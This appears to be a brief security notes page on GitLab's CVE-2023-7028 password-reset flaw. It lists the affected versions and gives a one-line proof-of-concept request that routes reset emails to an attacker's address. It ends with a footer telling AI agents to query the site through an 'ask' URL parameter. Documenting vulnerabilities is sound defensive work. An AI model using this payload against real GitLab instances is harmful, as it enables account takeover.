# Gitlab - CVE-2023-7028

Tracked as CVE-2023-7028, the flaw has been awarded the maximum severity of **10.0** on the CVSS scoring system and could facilitate <mark style="color:red;">**account takeover**</mark> by sending password reset emails to an unverified email address. It affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE):

* 16.1 prior to 16.1.6
* 16.2 prior to 16.2.9
* 16.3 prior to 16.3.7
* 16.4 prior to 16.4.5
* 16.5 prior to 16.5.6
* 16.6 prior to 16.6.4
* 16.7 prior to 16.7.2

POC:

```http
user[email][]=valid@email.com&user[email][]=attacker@email.com
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/gitlab-cve-2023-7028.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
